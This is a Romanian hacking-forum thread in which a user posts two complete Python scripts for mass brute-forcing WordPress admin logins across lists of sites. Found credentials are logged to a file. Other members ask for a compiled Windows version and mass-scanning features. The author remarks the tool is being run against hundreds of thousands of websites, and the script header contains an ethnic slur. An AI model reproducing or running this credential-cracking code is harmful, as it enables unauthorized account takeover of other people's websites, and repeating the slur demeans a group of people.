Brenin Posted July 10, 2013 Report Posted July 10, 2013 (edited) Un mic cadou din partea mea, poate fi considerat un fel de demo pentru un release ulterior in RST Market.#################################### Wordpress BruteForce Tool ###### Not designed for gypsies ###### Author: Brenin@RST ###### Jabber: obelix@creep.im ####################################import urllib, urllib2, cookielibfrom threading import Threaddef checker(username,password,urlogin,urlreq): try: cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) login_data = urllib.urlencode({'log' : username, 'pwd' : password}) opener.open(urlogin, login_data) resp = opener.open(urlreq) barf = resp.read() print "Checking login on " + urlogin + " with " + username + " and " + password if "Dashboard" in barf: fis = open("caremerg.txt", 'a') fis.write(urlogin + " " + username + " @@@ " + password + "\n") fis.flush() print " GOOOOOOOOOOOOOOOOOOOD ONEEEEEEEEEEEEEEEEE!!!" except Exception as e: #print e -> Uncomment this and comment the line below if you want to see errors f = 1if __name__ == '__main__': username = 'admin' password = ['admin','123456','password','Password1'] fis = open("sites.txt", 'rU') sites = fis.readlines() for i in range(4): for site in sites: urlogin = site.rstrip() + "/wp-login.php" urlreq = site.rstrip() + "/wp-admin/" #checker(username,password[i],urlogin,urlreq) -> function call for test purposes . IF this bugs you delete it. t = Thread(target = checker, args = (username,password[i],urlogin,urlreq)) t.start() t.join(1)Varianta de mai sus ruleaza cu setul de useri si parole setate in script.Varianta de mai jos incarca setul de useri din users.txt , setul de parole din passes.txt#################################### Wordpress BruteForce Tool ###### Not designed for gypsies ###### Author: Brenin@RST ###### Jabber: obelix@creep.im ####################################import urllib, urllib2, cookielibfrom threading import Threaddef checker(username,password,urlogin,urlreq): try: cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) login_data = urllib.urlencode({'log' : username, 'pwd' : password}) opener.open(urlogin, login_data) resp = opener.open(urlreq) barf = resp.read() print "Checking login on " + urlogin + " with " + username + " and " + password if "Dashboard" in barf: fis = open("caremerg.txt", 'a') fis.write(urlogin + " " + username + " @@@ " + password + "\n") fis.flush() print " GOOOOOOOOOOOOOOOOOOOD ONEEEEEEEEEEEEEEEEE!!!" except Exception as e: #print e -> Uncomment this and comment the line below if you want to see errors f = 1if __name__ == '__main__': fis = open("sites.txt", 'rU') fispas = open("passes.txt",'rU') fisusers = open("users.txt",'rU') passwords = fispas.readlines() users = fisusers.readlines() sites = fis.readlines() for passwd in passwords: for user in users: for site in sites: urlogin = site.rstrip() + "/wp-login.php" urlreq = site.rstrip() + "/wp-admin/" #checker(user.rstrip(),passwd.rstrip(),urlogin,urlreq) -> function call for test purposes . IF this bugs you delete it. t = Thread(target = checker, args = (user.rstrip(),passwd.rstrip(),urlogin,urlreq)) t.start() t.join(1)Va trebuie un fisier sites.txt care contine URL-uri in forma lor normala.Exemplu: Jamie Oliver | Official site for recipes, books, tv, restaurants and food revolutionSe porneste cu:python wpcrack.pyDaca se doreste, pot sa pun si varianta compilata pentru Windows.Viitor update o sa adaug Joomla, Drupal, WHMCS, WHM, ZenCart, si alte sugestii din partea voastra.Enjoy. Edited July 10, 2013 by Brenin 1 Quote
romanu Posted July 10, 2013 Report Posted July 10, 2013 E destul de dragut, dar era si mai dragut, daca il faceai ca parolele sa fie extrase dintr-un pass_file. Quote
d4rkm4nx99 Posted July 10, 2013 Report Posted July 10, 2013 E destul de dragut, dar era si mai dragut, daca il faceai ca parolele sa fie extrase dintr-un pass_file.exista si asa ceva gata facut Quote
d4rkm4nx99 Posted July 10, 2013 Report Posted July 10, 2013 era bun asa ceva https://rstforums.com/forum/71696-python-server-cpanel-cracker.rst dar sub forma de massscaner care sa ia automat lista de ip-uri loginuri si pass file momentan poti face treaba asta doar manual. Quote
Brenin Posted July 10, 2013 Author Report Posted July 10, 2013 O sa il modific in cateva ore sa incarce liste de useri si parole, desi nu vad cum v-ar ajuta asta, considerand ca il folositi pe sute de mii de website-uri. Dar o sa urc si varianta asta. Quote
Brenin Posted July 10, 2013 Author Report Posted July 10, 2013 Am adaugat si sursa pentru varianta cu setul de useri si parole din fisiere.Enjoy Quote
Brenin Posted July 11, 2013 Author Report Posted July 11, 2013 Astept si idei pentru imbunatatire/intregire Quote
rockeru133 Posted August 4, 2013 Report Posted August 4, 2013 versiunea compilat? pentru windows te rog frumos ? Quote
tazonne Posted August 11, 2013 Report Posted August 11, 2013 @Brenin varianta pt windows daca vrei sa o pui ar fi minunat ! Quote
Brenin Posted August 12, 2013 Author Report Posted August 12, 2013 O sa il compilez maine si o sa actualizez primul post,asteptam sa fie mai mult decat o singura cerere. Quote
d33nis Posted August 12, 2013 Report Posted August 12, 2013 @Brenin varianta pt windows daca vrei sa o pui ar fi minunat !+1 Quote
tazonne Posted August 12, 2013 Report Posted August 12, 2013 EU il astept... probabil ca lumea e plecata in concediu si sunt mai putini onlineO sa il compilez maine si o sa actualizez primul post,asteptam sa fie mai mult decat o singura cerere. Quote